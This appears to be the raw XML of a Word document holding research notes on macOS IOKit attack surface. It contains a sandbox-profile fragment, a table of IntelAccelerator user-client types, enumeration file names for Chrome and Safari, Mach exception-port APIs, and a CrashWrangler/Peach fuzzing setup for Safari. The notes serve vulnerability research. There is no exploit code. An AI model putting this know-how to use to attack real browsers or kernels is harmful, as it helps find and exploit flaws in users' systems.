        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  (allow iokit-open</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (iokit-user-client-class "AppleMGPUPowerControlClient"))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  ;; DisplayServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">  (allow iokit-set-properties</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">         (require-all (iokit-connection "IODisplay")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">                      (require-any (iokit-property "brightness")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   (iokit-property "linear-brightness")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   (iokit-property "commit")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   (iokit-property "rgcs")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   (iokit-property "ggcs")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00AA3893" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA3893">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   (iokit-property "bgcs")))))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B20FE" w:rsidRDefault="002B20FE" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="88"/>
          <w:szCs w:val="88"/>
        </w:rPr>
        <w:t>UserClients under IntelAccelerator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="88"/>
          <w:szCs w:val="88"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UserClient Name Type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4261"/>
        <w:gridCol w:w="4261"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B20FE" w:rsidRPr="002B20FE" w:rsidTr="002B20FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B20FE" w:rsidRPr="002B20FE" w:rsidRDefault="002B20FE" w:rsidP="002B20FE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>UserClient Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B20FE" w:rsidRPr="002B20FE" w:rsidRDefault="002B20FE" w:rsidP="002B20FE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Type</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Surface</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0</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GLContext</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1</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2DContext</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2</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OAccelDisplayPipeUserClient2</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4</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SharedUserClient</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5</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Device</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6</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OAccelMemoryInfoUserClient</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7</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CLContext</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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B20FE" w:rsidRPr="002B20FE"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CommandQueue</w:t>
            </w:r>
          </w:p>
        </w:tc>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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B20FE" w:rsidRPr="00C9194F" w:rsidTr="002B20FE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B20FE" w:rsidRPr="002B20FE" w:rsidRDefault="002B20FE" w:rsidP="002B20FE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B20FE">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>IGAccelVideoContext</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4261" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B20FE" w:rsidRPr="002B20FE" w:rsidRDefault="002B20FE" w:rsidP="002B20FE">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002B20FE">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>0x100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00AA3893" w:rsidRPr="00C9194F" w:rsidRDefault="00AA3893" w:rsidP="00AA3893">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB4967" w:rsidRDefault="00BB4967" w:rsidP="00BB4967">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Injection &amp; enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB01A5" w:rsidRDefault="00642498" w:rsidP="00EB01A5">
      <w:r w:rsidRPr="00642498">
        <w:t>QueryAllServices_from_chrome_gpu_detail.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00642498" w:rsidRDefault="00642498" w:rsidP="00EB01A5">
      <w:r w:rsidRPr="00642498">
        <w:t>QueryAllServices_from_</w:t>
      </w:r>
      <w:bookmarkStart w:id="177" w:name="_GoBack"/>
      <w:r w:rsidRPr="00642498">
        <w:t>chrome</w:t>
      </w:r>
      <w:bookmarkEnd w:id="177"/>
      <w:r w:rsidRPr="00642498">
        <w:t>_render_detail.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00642498" w:rsidRDefault="00642498" w:rsidP="00EB01A5">
      <w:r w:rsidRPr="00642498">
        <w:t>QueryAllServices_from_safari_detail.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00642498" w:rsidRDefault="00642498" w:rsidP="00EB01A5">
      <w:r w:rsidRPr="00642498">
        <w:t>QueryAllServices-machine-mini.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00642498" w:rsidRDefault="00642498" w:rsidP="00EB01A5">
      <w:r w:rsidRPr="00642498">
        <w:t>QueryAllServices-machine-pro.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00642498" w:rsidRPr="00EB01A5" w:rsidRDefault="00642498" w:rsidP="00EB01A5">
      <w:r w:rsidRPr="00642498">
        <w:t>QueryAllServices-vm.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB01A5" w:rsidRDefault="0072238E" w:rsidP="00EB01A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Font</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB01A5" w:rsidRDefault="00EB01A5" w:rsidP="00EB01A5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072238E" w:rsidRDefault="0072238E" w:rsidP="0072238E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">xxx </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072238E" w:rsidRDefault="0072238E" w:rsidP="0072238E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002151C5" w:rsidRDefault="002151C5" w:rsidP="002151C5"/>
    <w:p w:rsidR="00250CE4" w:rsidRDefault="00250CE4" w:rsidP="00250CE4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MacOS </w:t>
      </w:r>
      <w:r w:rsidR="0094173F">
        <w:t xml:space="preserve">Crash </w:t>
      </w:r>
      <w:r>
        <w:t>Log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0094173F" w:rsidRDefault="0094173F" w:rsidP="0094173F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>MacOS Exception</w:t>
      </w:r>
      <w:r w:rsidR="00973F3E">
        <w:t xml:space="preserve"> handling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4234" w:rsidRDefault="003D4234" w:rsidP="003D4234"/>
    <w:p w:rsidR="003D4234" w:rsidRDefault="003D4234" w:rsidP="00D313F6">
      <w:pPr>
        <w:ind w:firstLineChars="150" w:firstLine="330"/>
      </w:pPr>
      <w:r>
        <w:t>Sets of exception portsone port per exception typeare maintained at the host, task, and thread levels (</w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:anchor="ch09fig33" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Figure 933</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>). When an exception message is to be delivered, the kernel attempts to deliver it to the most specific port first. If either the delivery or the processing of that message fails, the kernel attempts the next most specific port. Thus, the order is thread, task, and host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4234" w:rsidRDefault="003D4234" w:rsidP="003D4234">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E4E28A6" wp14:editId="377A229A">
            <wp:extent cx="5274310" cy="40881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088130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4234" w:rsidRDefault="003D4234" w:rsidP="003D4234">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>34</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002C7D8D">
        <w:t>Kernel functions involved in Mach exception delivery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4234" w:rsidRDefault="003D4234" w:rsidP="003D4234"/>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>kern_return_t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="docemphstrong"/>
        </w:rPr>
        <w:t>task_set_exception_ports</w:t>
      </w:r>
      <w:r>
        <w:t>(task_t                task,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                         exception_mask_t      exception_types,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         mach_port_t           exception_port,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         exception_behavior_t  behavior,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         thread_state_flavor_t flavor);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t>kern_return_t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="docemphstrong"/>
        </w:rPr>
        <w:t>task_get_exception_ports</w:t>
      </w:r>
      <w:r>
        <w:t>(task_t                     task,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         exception_mask_t           exception_types,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         exception_mask_array_t     old_masks,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         exception_handler_array_t  old_handlers,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                         exception_behavior_array_t old_behaviors,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D313F6" w:rsidRPr="003D4234" w:rsidRDefault="00D313F6" w:rsidP="00D313F6">
      <w:r>
        <w:t xml:space="preserve">                         exception_flavor_array_t   old_flavors);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00250CE4" w:rsidRDefault="00250CE4" w:rsidP="002151C5"/>
    <w:p w:rsidR="0094173F" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:hyperlink r:id="rId115" w:history="1">
        <w:r w:rsidR="0094173F" w:rsidRPr="0092264A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://lackingrhoticity.blogspot.com/2013/08/handling-crashes-on-mac-os-x.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0094173F" w:rsidRDefault="0094173F" w:rsidP="002151C5"/>
    <w:p w:rsidR="00973F3E" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId116" w:anchor="L419" w:history="1">
        <w:r w:rsidR="00973F3E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:color w:val="336699"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>abnormal_exit_notify()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00973F3E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00973F3E">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>in osfmk/kern/exception.c is what implements sending EXC_CRASH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00973F3E" w:rsidRDefault="00973F3E" w:rsidP="002151C5"/>
    <w:p w:rsidR="006E5423" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId117" w:history="1">
        <w:r w:rsidR="006E5423">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:color w:val="336699"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>DisableOSCrashDumps()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E5423">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>function will register a signal handler in order to</w:t>
      </w:r>
      <w:r w:rsidR="006E5423">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:history="1">
        <w:r w:rsidR="006E5423">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
            <w:color w:val="336699"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>suppress Crash Reporter's crash reports</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E5423">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E5423">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E5423" w:rsidRDefault="006E5423" w:rsidP="002151C5"/>
    <w:p w:rsidR="00E4545D" w:rsidRDefault="004106D2" w:rsidP="002151C5">
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r w:rsidR="00E4545D" w:rsidRPr="0092264A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://an.enduringcolumn.com/2013/08/exceptional-exception-handling.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E4545D" w:rsidRDefault="00E4545D" w:rsidP="002151C5"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="002151C5"/>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="002151C5"/>
    <w:p w:rsidR="00420C4F" w:rsidRDefault="00420C4F" w:rsidP="00420C4F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CrashWrangler in Peach fuzzer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00105341" w:rsidP="002151C5">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xc_</w:t>
      </w:r>
      <w:r>
        <w:t>handler.m</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00420C4F" w:rsidRDefault="00420C4F" w:rsidP="00420C4F">
      <w:r>
        <w:t>./exc_handler "/Applications/Safari.app/Contents/MacOS/Safari" "$1" &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00420C4F" w:rsidP="00420C4F">
      <w:r>
        <w:t>EXCPID=$! # get the PID for the last added background process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00420C4F" w:rsidRDefault="00420C4F" w:rsidP="00420C4F"/>
    <w:p w:rsidR="00105341" w:rsidRPr="00105341" w:rsidRDefault="00105341" w:rsidP="00105341">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105341">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ret = task_set_exception_ports(mach_task_self(), </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105341" w:rsidRPr="00105341" w:rsidRDefault="00105341" w:rsidP="00105341">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105341">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                       mask,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00105341" w:rsidRPr="00105341" w:rsidRDefault="00105341" w:rsidP="00105341">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00105341">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                                       exc,</w:t>
      </w:r>
    </w:p>
